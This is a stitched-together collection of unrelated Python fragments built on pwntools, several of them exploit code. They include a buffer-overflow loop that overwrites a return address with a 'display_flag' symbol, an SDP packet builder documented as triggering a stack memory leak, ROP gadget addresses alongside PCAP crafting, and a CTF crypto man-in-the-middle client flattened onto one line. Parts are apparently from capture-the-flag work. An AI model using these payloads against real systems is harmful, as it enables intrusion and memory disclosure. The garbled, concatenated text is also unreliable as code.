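def _code_table_to_bits(table):
    """Convert a ``(length, code)`` table into a list of ``bitarray`` codes.

    For each entry the 16-bit big-endian encoding of ``code`` is loaded and
    only its last ``length`` bits are kept, i.e. the low-order ``length``
    bits of ``code``. A zero-length entry produces an empty ``bitarray`` so
    the result stays index-aligned with ``table``.

    Args:
        table: iterable of ``(length, code)`` pairs; ``code`` must fit in
            16 bits or ``pwn.p16`` raises.

    Returns:
        list of ``bitarray.bitarray`` objects, one per table entry.
    """
    codes = []
    for length, code in table:
        bits = bitarray.bitarray()
        if length != 0:
            bits.frombytes(pwn.p16(code, endian='big'))
            # pwn.p16 pads to 16 bits; keep only the code's significant bits.
            bits = bits[-length:]
        codes.append(bits)
    return codes


def init():
    """Populate the four module-level ``*_tree`` code lists.

    Reads the module-level tables ``s_lumin_ac``, ``s_lumin_dc``,
    ``s_chrom_ac`` and ``s_chrom_dc`` (presumably luminance/chrominance
    AC/DC Huffman tables — confirm) and assigns the converted lists to the
    corresponding ``s_*_tree`` globals. Each table uses the same
    conversion, so it is done once in ``_code_table_to_bits``.
    """
    global s_lumin_ac_tree
    global s_lumin_dc_tree
    global s_chrom_ac_tree
    global s_chrom_dc_tree
    s_lumin_ac_tree = _code_table_to_bits(s_lumin_ac)
    s_lumin_dc_tree = _code_table_to_bits(s_lumin_dc)
    s_chrom_ac_tree = _code_table_to_bits(s_chrom_ac)
    s_chrom_dc_tree = _code_table_to_bits(s_chrom_dc)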
def detect_segfault(canary):
    """Send fixed-offset payloads via ``send_payload`` until a reply contains "pico".

    Each payload is ``ofs`` bytes of ``b"A"`` followed by the 16-bit packed
    address of ``display_flag`` taken from ``remote_binary``'s symbol table.
    ``send_payload(canary, payload)`` returns the reply; the first reply
    containing "pico" (case-insensitive) is printed and the loop ends.

    NOTE(review): ``ofs`` is never modified inside the loop, so every
    iteration sends the identical payload and the loop only terminates when
    a reply matches — confirm this is intended.
    Depends on the module-level ``remote_binary`` and ``send_payload``,
    which are not defined here.
    """
    ofs = 16
    while True:
        #payload = pwn.fit({ofs: pwn.p16(pwn.ELF(remote_binary, False).sym["display_flag"])}, filler='B')
        # NOTE(review): the ELF is re-parsed on every iteration even though
        # the symbol address cannot change; it could be looked up once.
        payload = b"A" * ofs + pwn.p16(
            pwn.ELF(remote_binary, False).sym["display_flag"])
        rsp = send_payload(canary, payload)
        # assumes send_payload returns str (``.lower()`` is called on it) — TODO confirm
        if "pico" in rsp.lower():
            print(rsp)
            break
def construct_packet(service, continuation_state):
    """
    Construct an SDP message for `service` and continuation state
    `continuation_state`. This packet can be used to trigger the
    vulnerability in order to get memory from the stack.

    Params:
    - `service` - Service ID for the packet
    - `continuation_state` - Continuation state for the packet. For the
      exploit to work this should be the continuation state of a response
      received by SDP for another service.

    Returns:
    Valid SDP packet for the specified service ID.

    NOTE(review): the fixed fields are str literals while ``pwn.p16``
    returns bytes on Python 3, so this concatenation appears to be
    Python-2 only — confirm the intended interpreter.
    """
    # Fixed 3-byte prefix, then a 2-byte parameter length that covers the
    # 7 fixed bytes below (3 + 2 + 2) plus the continuation state.
    pkt = '\x02\x00\x00'
    pkt += pwn.p16(7 + len(continuation_state))
    pkt += '\x35\x03\x19'
    pkt += pwn.p16(service)
    pkt += '\x01\x00'
    # Caller-supplied continuation state is appended verbatim; its length
    # is only reflected in the length field above, never validated here.
    pkt += continuation_state
    return pkt
#!/usr/bin/python3 from Crypto.Cipher import AES from Crypto.Hash import SHA256 from Crypto.Util.number import long_to_bytes import pwn import re HOST = 'crypto-mitm.ctfz.one' client = pwn.remote(HOST, 3338) server = pwn.remote(HOST, 3339) length = pwn.u16(client.recvn(2)) client.recvn(length) server.send(pwn.p16(37)) server.send('ClientHello:SHA_AES_CTR_RSA_DHE_2048\n') length = pwn.u16(server.recvn(2)) data = server.recvn(length) s = pwn.process('./solve') private_key = int(s.recvline().strip(), 16) regex = 'ServerHello:' regex += 'p=(?P<p>[0-9a-f]+)\|' regex += 'g=(?P<g>[0-9a-f]+)\|' regex += 'A=(?P<A>[0-9a-f]+)\|' regex += 's=(?P<s>[0-9a-f]+)\|' regex = re.compile(regex)
import pwn
import time
import scapy.all  # not referenced in this excerpt

# PCAP Header crafting
# Global pcap file header, built by appending packed fields to ``pcap``.
# NOTE(review): ``pcap`` starts as str while pwn.p32 returns bytes on
# Python 3 — this looks Python-2 only; confirm the intended interpreter.
pcap = ""
pcap += pwn.p32(0xa1b2c3d4)  # PCAP magic
pcap += pwn.p16(2)  # PCAP 2.4 (major version)
pcap += pwn.p16(4)  # minor version
pcap += pwn.p32(0)  # UTC (thiszone offset)
pcap += pwn.p32(0)  # sigfigs
pcap += pwn.p32(65535)  # caplen (snapshot length)
pcap += pwn.p32(1)  # ethernet (link type)


# Helper function to populate packet headers in PCAP file
def add_packet_header(sl, l):
    """Append a per-packet record header to the global ``pcap`` buffer.

    Args:
        sl: number of packet bytes that follow in the file (captured length).
        l: original length of the packet on the wire.

    Side effects:
        Mutates the module-level ``pcap``; the timestamp is taken from
        ``time.time()`` at call time with a zero microsecond field.
    """
    global pcap
    pcap += pwn.p32(int(time.time()))  # ts_sec
    pcap += pwn.p32(0)  # ts_usec
    pcap += pwn.p32(sl)  # captured length
    pcap += pwn.p32(l)  # original length


## ROP Gadgets
# 0x00402083: pop rdi ; ret ; (1 found)
POP_RDI = 0x00402083
# 0x00402081: pop rsi ; pop r15 ; ret ; (1 found)
POP_RSI_R15 = 0x00402081
# 0x0040207d: pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret ; (1 found)
POP_RSP = 0x0040207d
def _create_hszf_header(payload, sender, reciever):
    """Build the big-endian header that precedes ``payload``.

    Layout, in order:
    - 4 bytes: ``len(payload) + 2`` (presumably counting the two address
      bytes below as well — confirm against the consumer);
    - 2 bytes: the constant ``1``;
    - 1 byte ``sender`` and 1 byte ``reciever`` (parameter name kept as
      callers use it).

    The payload bytes themselves are not part of the returned value.
    ``pwn.p8`` raises if an address does not fit in one byte.
    """
    length_field = pwn.p32(len(payload) + 2, endian='big')
    version_field = pwn.p16(1, endian='big')
    address_fields = pwn.p8(sender) + pwn.p8(reciever)
    return length_field + version_field + address_fields